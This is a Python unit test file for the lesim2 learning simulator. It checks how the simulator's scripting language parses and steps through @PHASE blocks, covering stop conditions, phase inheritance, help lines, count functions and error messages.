2020-11-16T20:41:53.000Z
|
tests/test_phase.py
|
markusrobertjonsson/lesim2
|
05e171dbb7f1f4046b4363083030dfc6195f5a03
|
[
"MIT"
] | 9
|
2019-04-17T19:48:19.000Z
|
2020-10-25T20:12:48.000Z
|
import matplotlib.pyplot as plt
from random import choice
from .testutil import LsTestCase, run, get_plot_data
from parsing import Script
def parse(text, phase_label):
    """Parse *text* as a script and return the phase registered under
    *phase_label*, parsing the phase itself on first access."""
    script = Script(text)
    script.parse()
    parser = script.script_parser
    phase = parser.phases.phases[phase_label]
    # Phases are parsed lazily; make sure this one is ready to step.
    if not phase.is_parsed:
        phase.parse(parser.parameters, parser.variables)
    return phase
class TestBasic(LsTestCase):
    """Basic @PHASE behavior: stepping between lines, stop conditions on
    stimulus elements, @variables, local variables and line labels."""

    @classmethod
    def setUpClass(cls):
        pass

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_simple(self):
        """e1/e2 alternate until the stop condition e1=10 is reached."""
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:e1=10
        L1 e1 | L2
        L2 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        for i in range(1, 19):
            stimulus = phase.next_stimulus('b2')[0]
            if i % 2 == 0:
                self.assertEqual(stimulus, {'e1': 1})
            else:
                self.assertEqual(stimulus, {'e2': 1})
        # The tenth e1 satisfies the stop condition: no further stimulus.
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)

    def test_first_line(self):
        """The first phase line in the script is the entry point, whatever
        its label."""
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:e1=10
        L2 e2 | new_trial
        new_trial e1 | L2
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        for i in range(1, 19):
            stimulus = phase.next_stimulus('b1')[0]
            if i % 2 == 0:
                self.assertEqual(stimulus, {'e1': 1}, f"{i}")
            else:
                self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)

    def test_variables(self):
        """@variables values may appear in stop conditions; local variables
        updated on help lines also drive stop conditions."""
        text = '''
        @variables nsteps: 10
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:e1=nsteps
        L2 e2 | new_trial
        new_trial e1 | L2
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        for i in range(1, 19):
            stimulus = phase.next_stimulus('b1')[0]
            if i % 2 == 0:
                self.assertEqual(stimulus, {'e1': 1}, f"{i}")
            else:
                self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)

        # Local variable incremented on a help line, compared to a
        # @variables value in the stop condition.
        text = '''
        @variables n:5
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:local_var=n
        L0 local_var:0 | L1
        L1 e1 | L2
        L2 e2 | H1
        H1 local_var:local_var+1 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        for i in range(1, 10):
            stimulus = phase.next_stimulus('b2')[0]
            if i % 2 == 0:
                self.assertEqual(stimulus, {'e1': 1})
            else:
                self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)
        self.assertEqual(phase.local_variables.values['local_var'], 5)

    def test_local_variable_in_stop(self):
        """A local variable (no @variables needed) can end the phase."""
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:local_var=5
        L0 local_var:0 | L1
        L1 e1 | L2
        L2 e2 | H1
        H1 local_var:local_var+1 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e1': 1})
        for i in range(1, 10):
            stimulus = phase.next_stimulus('b2')[0]
            if i % 2 == 0:
                self.assertEqual(stimulus, {'e1': 1})
            else:
                self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)
        self.assertEqual(phase.local_variables.values['local_var'], 5)

    def test_line_label_in_stop(self):
        """A line label in the stop condition counts visits to that line."""
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:L1=10
        L1 e1 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        for _ in range(1, 10):
            stimulus = phase.next_stimulus('b1')[0]
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)
class TestInheritance(LsTestCase):
    """Phase inheritance via @PHASE child(parent): overriding lines,
    whitespace tolerance, and the error messages for malformed headers."""

    def setUp(self):
        pass

    def test_simple(self):
        """A child phase overrides the parent's line with the same label."""
        text = '''
        stimulus_elements: e1, e2, e3
        behaviors: b1, b2
        @PHASE foo stop:L1=5
        L1 e1 | L2
        L2 e2 | L1
        @PHASE bar(foo) stop:e1=3
        L2 e3 | L1
        xscale: all # Just to finish the parsing of bar
        '''
        phase = parse(text, 'bar')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e3': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e3': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)

        # Overriding L1 instead of L2 changes the starting stimulus.
        text = '''
        stimulus_elements: e1, e2, e3
        behaviors: b1, b2
        @PHASE foo stop:L1=5
        L1 e1 | L2
        L2 e2 | L1
        @PHASE bar(foo) stop:e3=3
        L1 e3 | L2
        xscale: all # Just to finish the parsing of bar
        '''
        phase = parse(text, 'bar')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e3': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e3': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e3': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)

    def test_multiple_space(self):
        """Extra whitespace around 'stop : cond' is tolerated."""
        text = '''
        stimulus_elements: e1, e2, e3
        behaviors: b1, b2
        @PHASE foo stop:L1=5
        L1 e1 | L2
        L2 e2 | L1
        @PHASE bar(foo) stop : e3 = 3
        L1 e3 | L2
        xscale: all # Just to finish the parsing of bar
        '''
        phase = parse(text, 'bar')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e3': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e3': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e3': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)

    def test_wrong_parent_name(self):
        """Inheriting from an unknown phase label is an error."""
        text = '''
        stimulus_elements: e1, e2, e3
        behaviors: b1, b2
        @PHASE foo stop:L1=5
        L1 e1 | L2
        L2 e2 | L1
        @PHASE bar(foofel) stop:e1=3
        L2 e3 | L1
        xscale: all # Just to finish the parsing of bar
        '''
        msg = "Invalid phase label 'foofel'."
        with self.assertRaisesMsg(msg):
            parse(text, 'bar')

    def test_wrong_child_name(self):
        """A child phase may not reuse its parent's label."""
        text = '''
        stimulus_elements: e1, e2, e3
        behaviors: b1, b2
        @PHASE foo stop:L1=5
        L1 e1 | L2
        L2 e2 | L1
        @PHASE foo(foo) stop:e1=3
        L2 e3 | L1
        xscale: all # Just to finish the parsing of bar
        '''
        msg = "Redefinition of phase 'foo'."
        with self.assertRaisesMsg(msg):
            parse(text, 'bar')

    def test_wrong_syntax(self):
        """A space between label and '(parent)' breaks the header parse."""
        text = '''
        stimulus_elements: e1, e2, e3
        behaviors: b1, b2
        @PHASE foo stop:L1=5
        L1 e1 | L2
        L2 e2 | L1
        @PHASE bar (foo) stop:e1=3
        L2 e3 | L1
        xscale: all # Just to finish the parsing of bar
        '''
        msg = "Phase stop condition must have the form 'stop:condition'."
        with self.assertRaisesMsg(msg):
            parse(text, 'bar')

    def test_wrong_parentheses1(self):
        """Doubled parentheses make the parent label itself invalid."""
        text = '''
        stimulus_elements: e1, e2, e3
        behaviors: b1, b2
        @PHASE foo stop:L1=5
        L1 e1 | L2
        L2 e2 | L1
        @PHASE bar((foo)) stop:e1=3
        L2 e3 | L1
        xscale: all # Just to finish the parsing of bar
        '''
        msg = "Invalid phase label '(foo)'."
        with self.assertRaisesMsg(msg):
            parse(text, 'bar')

    def test_wrong_parentheses2(self):
        """Trailing junk after '(parent)' invalidates the child label."""
        text = '''
        stimulus_elements: e1, e2, e3
        behaviors: b1, b2
        @PHASE foo stop:L1=5
        L1 e1 | L2
        L2 e2 | L1
        @PHASE bar(foo)baz stop:e1=3
        L2 e3 | L1
        xscale: all # Just to finish the parsing of bar
        '''
        msg = "Phase label 'bar(foo)baz' is not a valid identifier."
        with self.assertRaisesMsg(msg):
            parse(text, 'bar')

    def test_wrong_parentheses3(self):
        """An unmatched closing parenthesis invalidates the label."""
        text = '''
        stimulus_elements: e1, e2, e3
        behaviors: b1, b2
        @PHASE foo stop:L1=5
        L1 e1 | L2
        L2 e2 | L1
        @PHASE barbazfoo) stop:e1=3
        L2 e3 | L1
        xscale: all # Just to finish the parsing of bar
        '''
        msg = "Phase label 'barbazfoo)' is not a valid identifier."
        with self.assertRaisesMsg(msg):
            parse(text, 'bar')

    def test_reference_to_undefined_local_variable(self):
        """Using a local variable the child never initialized raises at
        step time, not at parse time."""
        text = '''
        stimulus_elements: e1, e2, par1, par2
        behaviors: b1, b2
        # Squeeze in a little test of inheritance
        @PHASE parent stop:local_var2=5
        L0 local_var2:9 | L2
        L1 par1 | L1
        L2 par2,par1 | L1
        H1 local_var2:local_var2+1 | H1
        @PHASE phase_label(parent) stop:local_var=5
        L0 | L1
        L1 e1 | L2
        L2 e2 | H1
        H1 local_var:local_var+1 | L1
        beta: 1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e1': 1})
        msg = "Unknown variable 'local_var'."
        with self.assertRaisesMsg(msg):
            stimulus = phase.next_stimulus('b2')[0]
class TestHelpLine(LsTestCase):
    """Help lines (lines without a stimulus): pass-through behavior,
    response counting, count()/count_line()/count_reset(), and multiple
    comma-separated actions on one line."""

    def setUp(self):
        pass

    def test_no_action(self):
        """A help line with no action simply forwards to the next line."""
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:e1=10
        L1 e1 | H1
        H1 | L2
        L2 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        for i in range(1, 19):
            stimulus = phase.next_stimulus('b1')[0]
            if i % 2 == 0:
                self.assertEqual(stimulus, {'e1': 1})
            else:
                self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)

        # Same behavior with two chained help lines.
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:e1=10
        L1 e1 | H1
        H1 | H2
        H2 | L2
        L2 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        for i in range(1, 19):
            stimulus = phase.next_stimulus('b1')[0]
            if i % 2 == 0:
                self.assertEqual(stimulus, {'e1': 1})
            else:
                self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)

    def test_ignore_response_increment(self):
        """Passing through a help line must not count as an extra response
        toward the stop condition stop:b1=5."""
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:b1=5
        L1 e1 | H1
        H1 | L2
        L2 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]  # First stimulus
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNotNone(stimulus)  # Now count(b1) is 6

        # With two consecutive help lines
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:b1=5
        L1 e1 | H1
        H1 | H2
        H2 x:0 | L2
        L2 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]  # First stimulus
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNotNone(stimulus)  # Now count(b1) is 6

        # With two consecutive help lines
        # NOTE(review): this third script/assert section is byte-identical
        # to the second one above — it looks like a copy-paste duplicate;
        # confirm whether a variation was intended.
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:b1=5
        L1 e1 | H1
        H1 | H2
        H2 x:0 | L2
        L2 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]  # First stimulus
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNotNone(stimulus)  # Now count(b1) is 6

    def test_count_in_logic(self):
        """count(e1) in a line's condition branches after five e1's."""
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:e2=1
        L1 e1 | count(e1)=5 : L3 | L2
        L2 e1 | L1
        L3 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]  # First stimulus
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)

    def test_count_reset(self):
        """count_reset() restarts counting for an element, a behavior or a
        line label, making the count()-based branching periodic."""
        # Reset a stimulus element
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:e2=3
        L1 e1 | count(e1)=5 : H | L2
        L2 e1 | L1
        H count_reset(e1) | L3
        L3 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        for _ in range(1, 5):
            stimulus = phase.next_stimulus('b1')[0]
            self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        for _ in range(5):
            stimulus = phase.next_stimulus('b1')[0]
            self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        for _ in range(5):
            stimulus = phase.next_stimulus('b1')[0]
            self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)

        # Reset a behavior
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:False # Never stop
        L1 e1 | count(b1)>=5 : H | L2
        L2 e1 | L1
        H count_reset(b1) | L3
        L3 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]  # First stimulus
        self.assertEqual(stimulus, {'e1': 1})
        for i in range(2, 100):
            stimulus = phase.next_stimulus('b1')[0]
            if i % 6 == 0:
                self.assertEqual(stimulus, {'e2': 1})
            else:
                self.assertEqual(stimulus, {'e1': 1})

        # Reset a line label
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:L1=10 # L1 will never be 10
        L1 e1 | L1=5:H | L1
        H count_reset(L1) | L2
        L2 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        first = True
        for _ in range(1, 10):
            for i in range(5):
                if first:
                    stimulus = phase.next_stimulus(None)[0]
                    first = False
                else:
                    stimulus = phase.next_stimulus('b1')[0]
                self.assertEqual(stimulus, {'e1': 1})
            stimulus = phase.next_stimulus('b1')[0]
            self.assertEqual(stimulus, {'e2': 1})

        # Reset a line label
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:XH=10
        XL1 e1 | count(XL1)=5 : XH | XL2
        XL2 e1 | XL1
        XH count_reset(XL1) | XL3
        XL3 e2 | XL1
        '''
        phase = parse(text, 'phase_label')
        first = True
        for i in range(1, 100):
            if first:
                stimulus = phase.next_stimulus(None)[0]
                first = not first
            else:
                stimulus = phase.next_stimulus('b1')[0]
            if i % 10 == 0:
                self.assertEqual(stimulus, {'e2': 1})
            else:
                self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)

    def test_count_line(self):
        """count_line(b1) counts consecutive responses on the current line
        only, so off-line b2 responses do not accumulate."""
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:e2=5
        L1 e1 | count_line(b1)=3 : L2 | L1
        L2 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e1': 1})
        for _ in range(42):
            stimulus = phase.next_stimulus('b2')[0]
            self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        for _ in range(42):
            stimulus = phase.next_stimulus('b2')[0]
            self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})

        # Test same thing but with count(b1)=3 instead of count_line(b1)=3
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:e2=5
        L1 e1 | count(b1)==3 : L2 | L1
        L2 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e1': 1})
        for _ in range(42):
            stimulus = phase.next_stimulus('b2')[0]
            self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        for _ in range(42):
            stimulus = phase.next_stimulus('b2')[0]
            self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})

    def test_count_line_noarg(self):
        """count_line() without argument counts visits to the current line;
        count_line(L1) on line L1 behaves the same way."""
        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:e2=5
        L1 e1 | count_line()=3 : L2 | L1
        L2 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})

        text = '''
        stimulus_elements: e1, e2
        behaviors: b1, b2
        @PHASE phase_label stop:e2=2
        L1 e1 | count_line(L1)=3 : L2 | L1
        L2 e2 | L1
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertIsNone(stimulus)

    def test_multiple_actions1(self):
        """Several variable assignments may precede the goto on one line."""
        text = '''
        behaviors : b1, b2
        stimulus_elements : e1, e2
        @PHASE phase_label stop:e1=10
        A e1 | p1:1, p2:2, B
        B e2 | A
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertEqual(stimulus, {'e2': 1})
        self.assertEqual(phase.local_variables.values, {'p1': 1, 'p2': 2})

    def test_multiple_actions2(self):
        """Conditional multi-actions only run when the condition (b1) holds."""
        text = '''
        behaviors : b1, b2
        stimulus_elements : e1, e2, e3
        @PHASE phase_label stop:e1=10
        S | x1 = 0, x2 = 0, A
        A e1 | b1: x1:x1+1, x2:2, B | C
        B e2 | A
        C e3 | A
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e1': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 0, 'x2': 0})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertEqual(stimulus, {'e3': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 0, 'x2': 0})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 1, 'x2': 2})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        for i in range(7):
            stimulus = phase.next_stimulus('b1')[0]
            self.assertEqual(stimulus, {'e2': 1})
            self.assertEqual(phase.local_variables.values, {'x1': i + 2, 'x2': 2})
            stimulus = phase.next_stimulus('b1')[0]
            self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertIsNone(stimulus)

    def test_multiple_actions3(self):
        """Multi-actions may follow a count_line() condition."""
        text = '''
        behaviors : b1, b2
        stimulus_elements : e1, e2, e3
        @PHASE phase_label stop:e1=100
        S | x1 = 0, x2 = 0, A
        A e1 | count_line(b1)=5: x1=10, x2=10, B | A
        B e2 | A
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertEqual(stimulus, {'e1': 1})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 10, 'x2': 10})

    def test_multiple_actions4(self):
        """Unconditional and conditional actions may be mixed on one line;
        the unconditional x1=x1+1 runs on every visit."""
        text = '''
        behaviors : b1, b2
        stimulus_elements : e1, e2, e3
        @PHASE phase_label stop:e1=100
        S | x1 = 0, x2 = 0, A
        A e1 | x1=x1+1, count(b1)=6: x1=42, x2=2.5, B | C
        B e2 | A
        C e3 | A
        '''
        phase = parse(text, 'phase_label')
        stimulus = phase.next_stimulus(None)[0]
        self.assertEqual(stimulus, {'e1': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 0, 'x2': 0})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e3': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 1, 'x2': 0})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertEqual(stimulus, {'e1': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 1, 'x2': 0})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e3': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 2, 'x2': 0})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 2, 'x2': 0})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertEqual(stimulus, {'e3': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 3, 'x2': 0})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertEqual(stimulus, {'e1': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 3, 'x2': 0})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertEqual(stimulus, {'e3': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 4, 'x2': 0})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 4, 'x2': 0})
        stimulus = phase.next_stimulus('b2')[0]
        self.assertEqual(stimulus, {'e3': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 5, 'x2': 0})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e1': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 5, 'x2': 0})
        stimulus = phase.next_stimulus('b1')[0]
        self.assertEqual(stimulus, {'e2': 1})
        self.assertEqual(phase.local_variables.values, {'x1': 42, 'x2': 2.5})

    def test_multiple_actions_error1(self):
        """Two goto targets in the action list is an invalid condition."""
        text = '''
        behaviors : b1, b2
        stimulus_elements : e1, e2, e3
        @PHASE phase_label stop:e1=100
        S | x1 = 0, x2 = 0, A
        A e1 | x1=1, x2=2, B,A(1.1)
        B e2 | A
        C e3 | A
        '''
        msg = "Error on line 7: Invalid condition 'B,A(1.1)'."
        with self.assertRaisesMsg(msg):
            parse(text, 'phase_label')

    def test_multiple_actions_error2(self):
        """A goto probability outside [0,1] is rejected."""
        text = '''
        behaviors : b1, b2
        stimulus_elements : e1, e2, e3
        @PHASE phase_label stop:e1=100
        S | x1 = 0, x2 = 0, A
        A e1 | p1:1, p2:2, B(1.1),A(1.1)
        B e2 | A
        C e3 | A
        '''
        msg = "Error on line 7: Invalid condition 'B(1.1),A(1.1)'. Expected a probability, got '1.1'."
        with self.assertRaisesMsg(msg):
            parse(text, 'phase_label')

    def test_multiple_actions_error3(self):
        """A syntactically invalid condition expression is reported."""
        text = '''
        behaviors : b1, b2
        stimulus_elements : e1, e2, e3
        @PHASE phase_label stop:e1=100
        S | x1 = 0, x2 = 0, A
        A e1 | blaj1 blaj2 = blaj3 blaj4: x1:1, x2:2, B
        B e2 | A
        C e3 | A
        '''
        msg = "Error on line 7: Error in expression 'blaj1 blaj2 == blaj3 blaj4': invalid syntax."
        with self.assertRaisesMsg(msg):
